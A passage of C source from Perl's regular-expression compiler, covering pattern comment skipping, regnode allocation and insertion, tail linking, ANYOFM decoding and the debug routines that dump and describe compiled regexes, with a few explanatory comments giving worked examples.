sv_catpvn(matches_string, si_string, len - 1);
}
else {
matches_string = newSVpvn(si_string, len - 1);
}
si_string += len;
sv_catpvs(matches_string, " ");
} /* end of loop through the text */
assert(matches_string);
if (SvCUR(matches_string)) { /* Get rid of trailing blank */
SvCUR_set(matches_string, SvCUR(matches_string) - 1);
}
} /* end of has an 'si' */
}
/* Add the stuff that's already known */
if (invlist) {
/* Again, if the caller doesn't want the output inversion list, put
* everything in 'matches_string' */
if (! output_invlist) {
if ( ! matches_string) {
matches_string = newSVpvs("\n");
}
sv_catsv(matches_string, invlist_contents(invlist,
TRUE /* traditional style */
));
}
else if (! *output_invlist) {
*output_invlist = invlist_clone(invlist, NULL);
}
else {
_invlist_union(*output_invlist, invlist, output_invlist);
}
}
*listsvp = matches_string;
}
return invlist;
}
#endif /* !defined(PERL_IN_XSUB_RE) || defined(PLUGGABLE_RE_EXTENSION) */
/* reg_skipcomment()
Absorbs an /x style # comment from the input stream,
returning a pointer to the first character beyond the comment, or if the
comment terminates the pattern without anything following it, this returns
one past the final character of the pattern (in other words, RExC_end) and
sets the REG_RUN_ON_COMMENT_SEEN flag.
Note it's the caller's responsibility to ensure that we are
actually in /x mode
*/
PERL_STATIC_INLINE char*
S_reg_skipcomment(RExC_state_t *pRExC_state, char* p)
{
PERL_ARGS_ASSERT_REG_SKIPCOMMENT;
assert(*p == '#');
while (p < RExC_end) {
if (*(++p) == '\n') {
return p+1;
}
}
/* we ran off the end of the pattern without ending the comment, so we have
* to add an \n when wrapping */
RExC_seen |= REG_RUN_ON_COMMENT_SEEN;
return p;
}
STATIC void
S_skip_to_be_ignored_text(pTHX_ RExC_state_t *pRExC_state,
char ** p,
const bool force_to_xmod
)
{
/* If the text at the current parse position '*p' is a '(?#...)' comment,
* or if we are under /x or 'force_to_xmod' is TRUE, and the text at '*p'
* is /x whitespace, advance '*p' so that on exit it points to the first
* byte past all such white space and comments */
const bool use_xmod = force_to_xmod || (RExC_flags & RXf_PMf_EXTENDED);
PERL_ARGS_ASSERT_SKIP_TO_BE_IGNORED_TEXT;
assert( ! UTF || UTF8_IS_INVARIANT(**p) || UTF8_IS_START(**p));
for (;;) {
if (RExC_end - (*p) >= 3
&& *(*p) == '('
&& *(*p + 1) == '?'
&& *(*p + 2) == '#')
{
while (*(*p) != ')') {
if ((*p) == RExC_end)
FAIL("Sequence (?#... not terminated");
(*p)++;
}
(*p)++;
continue;
}
if (use_xmod) {
const char * save_p = *p;
while ((*p) < RExC_end) {
STRLEN len;
if ((len = is_PATWS_safe((*p), RExC_end, UTF))) {
(*p) += len;
}
else if (*(*p) == '#') {
(*p) = reg_skipcomment(pRExC_state, (*p));
}
else {
break;
}
}
if (*p != save_p) {
continue;
}
}
break;
}
return;
}
/* nextchar()
Advances the parse position by one byte, unless that byte is the beginning
of a '(?#...)' style comment, or is /x whitespace and /x is in effect. In
those two cases, the parse position is advanced beyond all such comments and
white space.
This is the UTF, (?#...), and /x friendly way of saying RExC_parse++.
*/
STATIC void
S_nextchar(pTHX_ RExC_state_t *pRExC_state)
{
PERL_ARGS_ASSERT_NEXTCHAR;
if (RExC_parse < RExC_end) {
assert( ! UTF
|| UTF8_IS_INVARIANT(*RExC_parse)
|| UTF8_IS_START(*RExC_parse));
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force /x */ );
}
}
STATIC void
S_change_engine_size(pTHX_ RExC_state_t *pRExC_state, const Ptrdiff_t size)
{
/* 'size' is the delta to add or subtract from the current memory allocated
* to the regex engine being constructed */
PERL_ARGS_ASSERT_CHANGE_ENGINE_SIZE;
RExC_size += size;
Renewc(RExC_rxi,
sizeof(regexp_internal) + (RExC_size + 1) * sizeof(regnode),
/* +1 for REG_MAGIC */
char,
regexp_internal);
if ( RExC_rxi == NULL )
FAIL("Regexp out of space");
RXi_SET(RExC_rx, RExC_rxi);
RExC_emit_start = RExC_rxi->program;
if (size > 0) {
Zero(REGNODE_p(RExC_emit), size, regnode);
}
#ifdef RE_TRACK_PATTERN_OFFSETS
Renew(RExC_offsets, 2*RExC_size+1, U32);
if (size > 0) {
Zero(RExC_offsets + 2*(RExC_size - size) + 1, 2 * size, U32);
}
RExC_offsets[0] = RExC_size;
#endif
}
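/* Illustrative sketch (hypothetical sizes): if RExC_size is currently 10
 * regnodes and a caller requests 3 more, the regexp_internal buffer is
 * reallocated to hold 13 regnodes plus the extra one for REG_MAGIC, the 3
 * regnodes at the current emit position are zeroed, and, when
 * RE_TRACK_PATTERN_OFFSETS is defined, the offsets array is grown with its
 * new entries zeroed in step. */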
STATIC regnode_offset
S_regnode_guts(pTHX_ RExC_state_t *pRExC_state, const U8 op, const STRLEN extra_size, const char* const name)
{
/* Allocate a regnode for 'op', with 'extra_size' extra space. It aligns
* and increments RExC_size and RExC_emit
*
* It returns the regnode's offset into the regex engine program */
const regnode_offset ret = RExC_emit;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGNODE_GUTS;
SIZE_ALIGN(RExC_size);
change_engine_size(pRExC_state, (Ptrdiff_t) 1 + extra_size);
NODE_ALIGN_FILL(REGNODE_p(ret));
#ifndef RE_TRACK_PATTERN_OFFSETS
PERL_UNUSED_ARG(name);
PERL_UNUSED_ARG(op);
#else
assert(extra_size >= regarglen[op] || PL_regkind[op] == ANYOF);
if (RExC_offsets) { /* MJD */
MJD_OFFSET_DEBUG(
("%s:%d: (op %s) %s %" UVuf " (len %" UVuf ") (max %" UVuf ").\n",
name, __LINE__,
PL_reg_name[op],
(UV)(RExC_emit) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)(RExC_emit),
(UV)(RExC_parse - RExC_start),
(UV)RExC_offsets[0]));
Set_Node_Offset(REGNODE_p(RExC_emit), RExC_parse + (op == END));
}
#endif
return(ret);
}
/*
- reg_node - emit a node
*/
STATIC regnode_offset /* Location. */
S_reg_node(pTHX_ RExC_state_t *pRExC_state, U8 op)
{
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reg_node");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REG_NODE;
assert(regarglen[op] == 0);
FILL_ADVANCE_NODE(ptr, op);
RExC_emit = ptr;
return(ret);
}
/*
- reganode - emit a node with an argument
*/
STATIC regnode_offset /* Location. */
S_reganode(pTHX_ RExC_state_t *pRExC_state, U8 op, U32 arg)
{
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reganode");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REGANODE;
/* ANYOF are special cased to allow non-length 1 args */
assert(regarglen[op] == 1);
FILL_ADVANCE_NODE_ARG(ptr, op, arg);
RExC_emit = ptr;
return(ret);
}
STATIC regnode_offset
S_reg2Lanode(pTHX_ RExC_state_t *pRExC_state, const U8 op, const U32 arg1, const I32 arg2)
{
/* emit a node with U32 and I32 arguments */
const regnode_offset ret = regnode_guts(pRExC_state, op, regarglen[op], "reg2Lanode");
regnode_offset ptr = ret;
PERL_ARGS_ASSERT_REG2LANODE;
assert(regarglen[op] == 2);
FILL_ADVANCE_NODE_2L_ARG(ptr, op, arg1, arg2);
RExC_emit = ptr;
return(ret);
}
/*
- reginsert - insert an operator in front of already-emitted operand
*
* That means that on exit 'operand' is the offset of the newly inserted
* operator, and the original operand has been relocated.
*
* IMPORTANT NOTE - it is the *callers* responsibility to correctly
* set up NEXT_OFF() of the inserted node if needed. Something like this:
*
* reginsert(pRExC, OPFAIL, orig_emit, depth+1);
* NEXT_OFF(orig_emit) = regarglen[OPFAIL] + NODE_STEP_REGNODE;
*
* ALSO NOTE - FLAGS(newly-inserted-operator) will be set to 0 as well.
*/
STATIC void
S_reginsert(pTHX_ RExC_state_t *pRExC_state, const U8 op,
const regnode_offset operand, const U32 depth)
{
regnode *src;
regnode *dst;
regnode *place;
const int offset = regarglen[(U8)op];
const int size = NODE_STEP_REGNODE + offset;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGINSERT;
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(depth);
/* (PL_regkind[(U8)op] == CURLY ? EXTRA_STEP_2ARGS : 0); */
DEBUG_PARSE_FMT("inst"," - %s", PL_reg_name[op]);
assert(!RExC_study_started); /* I believe we should never use reginsert once we have started
studying. If this is wrong then we need to adjust RExC_recurse
below like we do with RExC_open_parens/RExC_close_parens. */
change_engine_size(pRExC_state, (Ptrdiff_t) size);
src = REGNODE_p(RExC_emit);
RExC_emit += size;
dst = REGNODE_p(RExC_emit);
/* If we are in a "count the parentheses" pass, the numbers are unreliable,
* and [perl #133871] shows this can lead to problems, so skip this
* realignment of parens until a later pass when they are reliable */
if (! IN_PARENS_PASS && RExC_open_parens) {
int paren;
/*DEBUG_PARSE_FMT("inst"," - %" IVdf, (IV)RExC_npar);*/
/* remember that RExC_npar is rex->nparens + 1,
* iow it is 1 more than the number of parens seen in
* the pattern so far. */
for ( paren=0 ; paren < RExC_npar ; paren++ ) {
/* note, RExC_open_parens[0] is the start of the
* regex, it can't move. RExC_close_parens[0] is the end
* of the regex, it *can* move. */
if ( paren && RExC_open_parens[paren] >= operand ) {
/*DEBUG_PARSE_FMT("open"," - %d", size);*/
RExC_open_parens[paren] += size;
} else {
/*DEBUG_PARSE_FMT("open"," - %s","ok");*/
}
if ( RExC_close_parens[paren] >= operand ) {
/*DEBUG_PARSE_FMT("close"," - %d", size);*/
RExC_close_parens[paren] += size;
} else {
/*DEBUG_PARSE_FMT("close"," - %s","ok");*/
}
}
}
if (RExC_end_op)
RExC_end_op += size;
while (src > REGNODE_p(operand)) {
StructCopy(--src, --dst, regnode);
#ifdef RE_TRACK_PATTERN_OFFSETS
if (RExC_offsets) { /* MJD 20010112 */
MJD_OFFSET_DEBUG(
("%s(%d): (op %s) %s copy %" UVuf " -> %" UVuf " (max %" UVuf ").\n",
"reginsert",
__LINE__,
PL_reg_name[op],
(UV)(REGNODE_OFFSET(dst)) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)REGNODE_OFFSET(src),
(UV)REGNODE_OFFSET(dst),
(UV)RExC_offsets[0]));
Set_Node_Offset_To_R(REGNODE_OFFSET(dst), Node_Offset(src));
Set_Node_Length_To_R(REGNODE_OFFSET(dst), Node_Length(src));
}
#endif
}
place = REGNODE_p(operand); /* Op node, where operand used to be. */
#ifdef RE_TRACK_PATTERN_OFFSETS
if (RExC_offsets) { /* MJD */
MJD_OFFSET_DEBUG(
("%s(%d): (op %s) %s %" UVuf " <- %" UVuf " (max %" UVuf ").\n",
"reginsert",
__LINE__,
PL_reg_name[op],
(UV)REGNODE_OFFSET(place) > RExC_offsets[0]
? "Overwriting end of array!\n" : "OK",
(UV)REGNODE_OFFSET(place),
(UV)(RExC_parse - RExC_start),
(UV)RExC_offsets[0]));
Set_Node_Offset(place, RExC_parse);
Set_Node_Length(place, 1);
}
#endif
src = NEXTOPER(place);
FLAGS(place) = 0;
FILL_NODE(operand, op);
/* Zero out any arguments in the new node */
Zero(src, offset, regnode);
}
/*
- regtail - set the next-pointer at the end of a node chain of p to val. If
            that value won't fit in the space available, it instead returns
            FALSE.  (Except that it asserts if we can't fit in the largest
            space the regex engine is designed for.)
- SEE ALSO: regtail_study
*/
STATIC bool
S_regtail(pTHX_ RExC_state_t * pRExC_state,
const regnode_offset p,
const regnode_offset val,
const U32 depth)
{
regnode_offset scan;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGTAIL;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
/* Find last node. */
scan = (regnode_offset) p;
for (;;) {
regnode * const temp = regnext(REGNODE_p(scan));
DEBUG_PARSE_r({
DEBUG_PARSE_MSG((scan==p ? "tail" : ""));
regprop(RExC_rx, RExC_mysv, REGNODE_p(scan), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ %s (%d) %s %s\n",
SvPV_nolen_const(RExC_mysv), scan,
(temp == NULL ? "->" : ""),
(temp == NULL ? PL_reg_name[OP(REGNODE_p(val))] : "")
);
});
if (temp == NULL)
break;
scan = REGNODE_OFFSET(temp);
}
if (reg_off_by_arg[OP(REGNODE_p(scan))]) {
assert((UV) (val - scan) <= U32_MAX);
ARG_SET(REGNODE_p(scan), val - scan);
}
else {
if (val - scan > U16_MAX) {
/* Populate this with something that won't loop and will likely
* lead to a crash if the caller ignores the failure return, and
* execution continues */
NEXT_OFF(REGNODE_p(scan)) = U16_MAX;
return FALSE;
}
NEXT_OFF(REGNODE_p(scan)) = val - scan;
}
return TRUE;
}
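/* Illustrative sketch (hypothetical node offsets): suppose the last node in
 * p's chain sits at offset 5 and stores its next pointer in the 16-bit
 * NEXT_OFF field, while 'val' sits at offset 70005.  The required relative
 * offset of 70000 exceeds U16_MAX, so regtail() stores U16_MAX as a poison
 * value and returns FALSE, leaving it to the caller to handle the
 * overflow. */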
#ifdef DEBUGGING
/*
- regtail_study - set the next-pointer at the end of a node chain of p to val.
- Look for optimizable sequences at the same time.
- currently only looks for EXACT chains.
This is experimental code. The idea is to use this routine to perform
in place optimizations on branches and groups as they are constructed,
with the long term intention of removing optimization from study_chunk so
that it is purely analytical.
Currently only used when in DEBUG mode. The macro REGTAIL_STUDY() is used
to control which is which.
This used to return a value that was ignored. It was a problem that it is
#ifdef'd to be another function that didn't return a value. khw has changed it
so both currently return a pass/fail value.
*/
/* TODO: All four parms should be const */
STATIC bool
S_regtail_study(pTHX_ RExC_state_t *pRExC_state, regnode_offset p,
const regnode_offset val, U32 depth)
{
regnode_offset scan;
U8 exact = PSEUDO;
#ifdef EXPERIMENTAL_INPLACESCAN
I32 min = 0;
#endif
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGTAIL_STUDY;
/* Find last node. */
scan = p;
for (;;) {
regnode * const temp = regnext(REGNODE_p(scan));
#ifdef EXPERIMENTAL_INPLACESCAN
if (PL_regkind[OP(REGNODE_p(scan))] == EXACT) {
bool unfolded_multi_char; /* Unexamined in this routine */
if (join_exact(pRExC_state, scan, &min,
&unfolded_multi_char, 1, REGNODE_p(val), depth+1))
return TRUE; /* Was return EXACT */
}
#endif
if ( exact ) {
switch (OP(REGNODE_p(scan))) {
case EXACT:
case EXACT_ONLY8:
case EXACTL:
case EXACTF:
case EXACTFU_S_EDGE:
case EXACTFAA_NO_TRIE:
case EXACTFAA:
case EXACTFU:
case EXACTFU_ONLY8:
case EXACTFLU8:
case EXACTFUP:
case EXACTFL:
if( exact == PSEUDO )
exact= OP(REGNODE_p(scan));
else if ( exact != OP(REGNODE_p(scan)) )
exact= 0;
case NOTHING:
break;
default:
exact= 0;
}
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG((scan==p ? "tsdy" : ""));
regprop(RExC_rx, RExC_mysv, REGNODE_p(scan), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ %s (%d) -> %s\n",
SvPV_nolen_const(RExC_mysv),
scan,
PL_reg_name[exact]);
});
if (temp == NULL)
break;
scan = REGNODE_OFFSET(temp);
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("");
regprop(RExC_rx, RExC_mysv, REGNODE_p(val), NULL, pRExC_state);
Perl_re_printf( aTHX_
"~ attach to %s (%" IVdf ") offset to %" IVdf "\n",
SvPV_nolen_const(RExC_mysv),
(IV)val,
(IV)(val - scan)
);
});
if (reg_off_by_arg[OP(REGNODE_p(scan))]) {
assert((UV) (val - scan) <= U32_MAX);
ARG_SET(REGNODE_p(scan), val - scan);
}
else {
if (val - scan > U16_MAX) {
/* Populate this with something that won't loop and will likely
* lead to a crash if the caller ignores the failure return, and
* execution continues */
NEXT_OFF(REGNODE_p(scan)) = U16_MAX;
return FALSE;
}
NEXT_OFF(REGNODE_p(scan)) = val - scan;
}
return TRUE; /* Was 'return exact' */
}
#endif
STATIC SV*
S_get_ANYOFM_contents(pTHX_ const regnode * n) {
/* Returns an inversion list of all the code points matched by the
* ANYOFM/NANYOFM node 'n' */
SV * cp_list = _new_invlist(-1);
const U8 lowest = (U8) ARG(n);
unsigned int i;
U8 count = 0;
U8 needed = 1U << PL_bitcount[ (U8) ~ FLAGS(n)];
PERL_ARGS_ASSERT_GET_ANYOFM_CONTENTS;
/* Starting with the lowest code point, any code point that ANDed with the
* mask yields the lowest code point is in the set */
for (i = lowest; i <= 0xFF; i++) {
if ((i & FLAGS(n)) == ARG(n)) {
cp_list = add_cp_to_invlist(cp_list, i);
count++;
            /* We know how many code points (a power of two) are in the
             * set.  No use looking once we've got that number */
if (count >= needed) break;
}
}
if (OP(n) == NANYOFM) {
_invlist_invert(cp_list);
}
return cp_list;
}
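/* Worked example (hypothetical node contents): an ANYOFM node whose ARG is
 * 0x41 ('A') and whose FLAGS mask is 0xDF has a single free bit (~0xDF is
 * 0x20), so 'needed' is 2.  The scan finds exactly 0x41 ('A') and 0x61
 * ('a'), the only bytes whose AND with the mask yields 0x41, and the
 * returned inversion list contains just those two code points.  For a
 * NANYOFM node the same list would then be complemented. */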
/*
- regdump - dump a regexp onto Perl_debug_log in vaguely comprehensible form
*/
#ifdef DEBUGGING
static void
S_regdump_intflags(pTHX_ const char *lead, const U32 flags)
{
int bit;
int set=0;
ASSUME(REG_INTFLAGS_NAME_SIZE <= sizeof(flags)*8);
for (bit=0; bit<REG_INTFLAGS_NAME_SIZE; bit++) {
if (flags & (1<<bit)) {
if (!set++ && lead)
Perl_re_printf( aTHX_ "%s", lead);
Perl_re_printf( aTHX_ "%s ", PL_reg_intflags_name[bit]);
}
}
if (lead) {
if (set)
Perl_re_printf( aTHX_ "\n");
else
Perl_re_printf( aTHX_ "%s[none-set]\n", lead);
}
}
static void
S_regdump_extflags(pTHX_ const char *lead, const U32 flags)
{
int bit;
int set=0;
regex_charset cs;
ASSUME(REG_EXTFLAGS_NAME_SIZE <= sizeof(flags)*8);
for (bit=0; bit<REG_EXTFLAGS_NAME_SIZE; bit++) {
if (flags & (1<<bit)) {
if ((1<<bit) & RXf_PMf_CHARSET) { /* Output separately, below */
continue;
}
if (!set++ && lead)
Perl_re_printf( aTHX_ "%s", lead);
Perl_re_printf( aTHX_ "%s ", PL_reg_extflags_name[bit]);
}
}
if ((cs = get_regex_charset(flags)) != REGEX_DEPENDS_CHARSET) {
if (!set++ && lead) {
Perl_re_printf( aTHX_ "%s", lead);
}
switch (cs) {
case REGEX_UNICODE_CHARSET:
Perl_re_printf( aTHX_ "UNICODE");
break;
case REGEX_LOCALE_CHARSET:
Perl_re_printf( aTHX_ "LOCALE");
break;
case REGEX_ASCII_RESTRICTED_CHARSET:
Perl_re_printf( aTHX_ "ASCII-RESTRICTED");
break;
case REGEX_ASCII_MORE_RESTRICTED_CHARSET:
Perl_re_printf( aTHX_ "ASCII-MORE_RESTRICTED");
break;
default:
Perl_re_printf( aTHX_ "UNKNOWN CHARACTER SET");
break;
}
}
if (lead) {
if (set)
Perl_re_printf( aTHX_ "\n");
else
Perl_re_printf( aTHX_ "%s[none-set]\n", lead);
}
}
#endif
void
Perl_regdump(pTHX_ const regexp *r)
{
#ifdef DEBUGGING
int i;
SV * const sv = sv_newmortal();
SV *dsv= sv_newmortal();
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGDUMP;
(void)dumpuntil(r, ri->program, ri->program + 1, NULL, NULL, sv, 0, 0);
/* Header fields of interest. */
for (i = 0; i < 2; i++) {
if (r->substrs->data[i].substr) {
RE_PV_QUOTED_DECL(s, 0, dsv,
SvPVX_const(r->substrs->data[i].substr),
RE_SV_DUMPLEN(r->substrs->data[i].substr),
PL_dump_re_max_len);
Perl_re_printf( aTHX_
"%s %s%s at %" IVdf "..%" UVuf " ",
i ? "floating" : "anchored",
s,
RE_SV_TAIL(r->substrs->data[i].substr),
(IV)r->substrs->data[i].min_offset,
(UV)r->substrs->data[i].max_offset);
}
else if (r->substrs->data[i].utf8_substr) {
RE_PV_QUOTED_DECL(s, 1, dsv,
SvPVX_const(r->substrs->data[i].utf8_substr),
RE_SV_DUMPLEN(r->substrs->data[i].utf8_substr),
30);
Perl_re_printf( aTHX_
"%s utf8 %s%s at %" IVdf "..%" UVuf " ",
i ? "floating" : "anchored",
s,
RE_SV_TAIL(r->substrs->data[i].utf8_substr),
(IV)r->substrs->data[i].min_offset,
(UV)r->substrs->data[i].max_offset);
}
}
if (r->check_substr || r->check_utf8)
Perl_re_printf( aTHX_
(const char *)
( r->check_substr == r->substrs->data[1].substr
&& r->check_utf8 == r->substrs->data[1].utf8_substr
? "(checking floating" : "(checking anchored"));
if (r->intflags & PREGf_NOSCAN)
Perl_re_printf( aTHX_ " noscan");
if (r->extflags & RXf_CHECK_ALL)
Perl_re_printf( aTHX_ " isall");
if (r->check_substr || r->check_utf8)
Perl_re_printf( aTHX_ ") ");
if (ri->regstclass) {
regprop(r, sv, ri->regstclass, NULL, NULL);
Perl_re_printf( aTHX_ "stclass %s ", SvPVX_const(sv));
}
if (r->intflags & PREGf_ANCH) {
Perl_re_printf( aTHX_ "anchored");
if (r->intflags & PREGf_ANCH_MBOL)
Perl_re_printf( aTHX_ "(MBOL)");
if (r->intflags & PREGf_ANCH_SBOL)
Perl_re_printf( aTHX_ "(SBOL)");
if (r->intflags & PREGf_ANCH_GPOS)
Perl_re_printf( aTHX_ "(GPOS)");
Perl_re_printf( aTHX_ " ");
}
if (r->intflags & PREGf_GPOS_SEEN)
Perl_re_printf( aTHX_ "GPOS:%" UVuf " ", (UV)r->gofs);
if (r->intflags & PREGf_SKIP)
Perl_re_printf( aTHX_ "plus ");
if (r->intflags & PREGf_IMPLICIT)
Perl_re_printf( aTHX_ "implicit ");
Perl_re_printf( aTHX_ "minlen %" IVdf " ", (IV)r->minlen);
if (r->extflags & RXf_EVAL_SEEN)
Perl_re_printf( aTHX_ "with eval ");
Perl_re_printf( aTHX_ "\n");
DEBUG_FLAGS_r({
regdump_extflags("r->extflags: ", r->extflags);
regdump_intflags("r->intflags: ", r->intflags);
});
#else
PERL_ARGS_ASSERT_REGDUMP;
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(r);
#endif /* DEBUGGING */
}
/* Should be synchronized with ANYOF_ #defines in regcomp.h */
#ifdef DEBUGGING
# if _CC_WORDCHAR != 0 || _CC_DIGIT != 1 || _CC_ALPHA != 2 \
|| _CC_LOWER != 3 || _CC_UPPER != 4 || _CC_PUNCT != 5 \
|| _CC_PRINT != 6 || _CC_ALPHANUMERIC != 7 || _CC_GRAPH != 8 \
|| _CC_CASED != 9 || _CC_SPACE != 10 || _CC_BLANK != 11 \
|| _CC_XDIGIT != 12 || _CC_CNTRL != 13 || _CC_ASCII != 14 \
|| _CC_VERTSPACE != 15
# error Need to adjust order of anyofs[]
# endif
static const char * const anyofs[] = {
"\\w",
"\\W",
"\\d",
"\\D",
"[:alpha:]",
"[:^alpha:]",
"[:lower:]",
"[:^lower:]",
"[:upper:]",
"[:^upper:]",
"[:punct:]",
"[:^punct:]",
"[:print:]",
"[:^print:]",
"[:alnum:]",
"[:^alnum:]",
"[:graph:]",
"[:^graph:]",
"[:cased:]",
"[:^cased:]",
"\\s",
"\\S",
"[:blank:]",
"[:^blank:]",
"[:xdigit:]",
"[:^xdigit:]",
"[:cntrl:]",
"[:^cntrl:]",
"[:ascii:]",
"[:^ascii:]",
"\\v",
"\\V"
};
#endif
/*
- regprop - printable representation of opcode, with run time support
*/
void
Perl_regprop(pTHX_ const regexp *prog, SV *sv, const regnode *o, const regmatch_info *reginfo, const RExC_state_t *pRExC_state)
{
#ifdef DEBUGGING
dVAR;
int k;
RXi_GET_DECL(prog, progi);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGPROP;
SvPVCLEAR(sv);
if (OP(o) > REGNODE_MAX) /* regnode.type is unsigned */
/* It would be nice to FAIL() here, but this may be called from
regexec.c, and it would be hard to supply pRExC_state. */
Perl_croak(aTHX_ "Corrupted regexp opcode %d > %d",
(int)OP(o), (int)REGNODE_MAX);
sv_catpv(sv, PL_reg_name[OP(o)]); /* Take off const! */
k = PL_regkind[OP(o)];
if (k == EXACT) {
sv_catpvs(sv, " ");
/* Using is_utf8_string() (via PERL_PV_UNI_DETECT)
* is a crude hack but it may be the best for now since
* we have no flag "this EXACTish node was UTF-8"
* --jhi */
pv_pretty(sv, STRING(o), STR_LEN(o), PL_dump_re_max_len,
PL_colors[0], PL_colors[1],
PERL_PV_ESCAPE_UNI_DETECT |
PERL_PV_ESCAPE_NONASCII |
PERL_PV_PRETTY_ELLIPSES |
PERL_PV_PRETTY_LTGT |
PERL_PV_PRETTY_NOCLEAR
);
} else if (k == TRIE) {
/* print the details of the trie in dumpuntil instead, as
* progi->data isn't available here */
const char op = OP(o);
const U32 n = ARG(o);
const reg_ac_data * const ac = IS_TRIE_AC(op) ?
(reg_ac_data *)progi->data->data[n] :
NULL;
const reg_trie_data * const trie
= (reg_trie_data*)progi->data->data[!IS_TRIE_AC(op) ? n : ac->trie];
Perl_sv_catpvf(aTHX_ sv, "-%s", PL_reg_name[o->flags]);
DEBUG_TRIE_COMPILE_r({
if (trie->jump)
sv_catpvs(sv, "(JUMP)");
Perl_sv_catpvf(aTHX_ sv,
"<S:%" UVuf "/%" IVdf " W:%" UVuf " L:%" UVuf "/%" UVuf " C:%" UVuf "/%" UVuf ">",
(UV)trie->startstate,
(IV)trie->statecount-1, /* -1 because of the unused 0 element */
(UV)trie->wordcount,
(UV)trie->minlen,
(UV)trie->maxlen,
(UV)TRIE_CHARCOUNT(trie),
(UV)trie->uniquecharcount
);
});
if ( IS_ANYOF_TRIE(op) || trie->bitmap ) {
sv_catpvs(sv, "[");
(void) put_charclass_bitmap_innards(sv,
((IS_ANYOF_TRIE(op))
? ANYOF_BITMAP(o)
: TRIE_BITMAP(trie)),
NULL,
NULL,
NULL,
FALSE
);
sv_catpvs(sv, "]");
}
} else if (k == CURLY) {
U32 lo = ARG1(o), hi = ARG2(o);
if (OP(o) == CURLYM || OP(o) == CURLYN || OP(o) == CURLYX)
Perl_sv_catpvf(aTHX_ sv, "[%d]", o->flags); /* Parenth number */
Perl_sv_catpvf(aTHX_ sv, "{%u,", (unsigned) lo);
if (hi == REG_INFTY)
sv_catpvs(sv, "INFTY");
else
Perl_sv_catpvf(aTHX_ sv, "%u", (unsigned) hi);
sv_catpvs(sv, "}");
}
else if (k == WHILEM && o->flags) /* Ordinal/of */
Perl_sv_catpvf(aTHX_ sv, "[%d/%d]", o->flags & 0xf, o->flags>>4);
else if (k == REF || k == OPEN || k == CLOSE
|| k == GROUPP || OP(o)==ACCEPT)
{
AV *name_list= NULL;
U32 parno= OP(o) == ACCEPT ? (U32)ARG2L(o) : ARG(o);
Perl_sv_catpvf(aTHX_ sv, "%" UVuf, (UV)parno); /* Parenth number */
if ( RXp_PAREN_NAMES(prog) ) {
name_list= MUTABLE_AV(progi->data->data[progi->name_list_idx]);
} else if ( pRExC_state ) {
name_list= RExC_paren_name_list;
}
if (name_list) {
if ( k != REF || (OP(o) < NREF)) {
SV **name= av_fetch(name_list, parno, 0 );
if (name)
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
else {
SV *sv_dat= MUTABLE_SV(progi->data->data[ parno ]);
I32 *nums=(I32*)SvPVX(sv_dat);
SV **name= av_fetch(name_list, nums[0], 0 );
I32 n;
if (name) {
for ( n=0; n<SvIVX(sv_dat); n++ ) {
Perl_sv_catpvf(aTHX_ sv, "%s%" IVdf,
(n ? "," : ""), (IV)nums[n]);
}
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
}
}
if ( k == REF && reginfo) {
U32 n = ARG(o); /* which paren pair */
I32 ln = prog->offs[n].start;
if (prog->lastparen < n || ln == -1 || prog->offs[n].end == -1)
Perl_sv_catpvf(aTHX_ sv, ": FAIL");
else if (ln == prog->offs[n].end)
Perl_sv_catpvf(aTHX_ sv, ": ACCEPT - EMPTY STRING");
else {
const char *s = reginfo->strbeg + ln;
Perl_sv_catpvf(aTHX_ sv, ": ");
Perl_pv_pretty( aTHX_ sv, s, prog->offs[n].end - prog->offs[n].start, 32, 0, 0,
PERL_PV_ESCAPE_UNI_DETECT|PERL_PV_PRETTY_NOCLEAR|PERL_PV_PRETTY_ELLIPSES|PERL_PV_PRETTY_QUOTE );
}
}
} else if (k == GOSUB) {
AV *name_list= NULL;
if ( RXp_PAREN_NAMES(prog) ) {
name_list= MUTABLE_AV(progi->data->data[progi->name_list_idx]);
} else if ( pRExC_state ) {
name_list= RExC_paren_name_list;
}
/* Paren and offset */
Perl_sv_catpvf(aTHX_ sv, "%d[%+d:%d]", (int)ARG(o),(int)ARG2L(o),
(int)((o + (int)ARG2L(o)) - progi->program) );
if (name_list) {
SV **name= av_fetch(name_list, ARG(o), 0 );
if (name)
Perl_sv_catpvf(aTHX_ sv, " '%" SVf "'", SVfARG(*name));
}
}
else if (k == LOGICAL)
/* 2: embedded, otherwise 1 */
Perl_sv_catpvf(aTHX_ sv, "[%d]", o->flags);
else if (k == ANYOF) {
const U8 flags = (OP(o) == ANYOFH) ? 0 : ANYOF_FLAGS(o);
bool do_sep = FALSE; /* Do we need to separate various components of
the output? */
/* Set if there is still an unresolved user-defined property */
SV *unresolved = NULL;
/* Things that are ignored except when the runtime locale is UTF-8 */
SV *only_utf8_locale_invlist = NULL;
/* Code points that don't fit in the bitmap */
SV *nonbitmap_invlist = NULL;
        /* And things that aren't in the bitmap, but are small enough to be in
         * it */
SV* bitmap_range_not_in_bitmap = NULL;
const bool inverted = flags & ANYOF_INVERT;
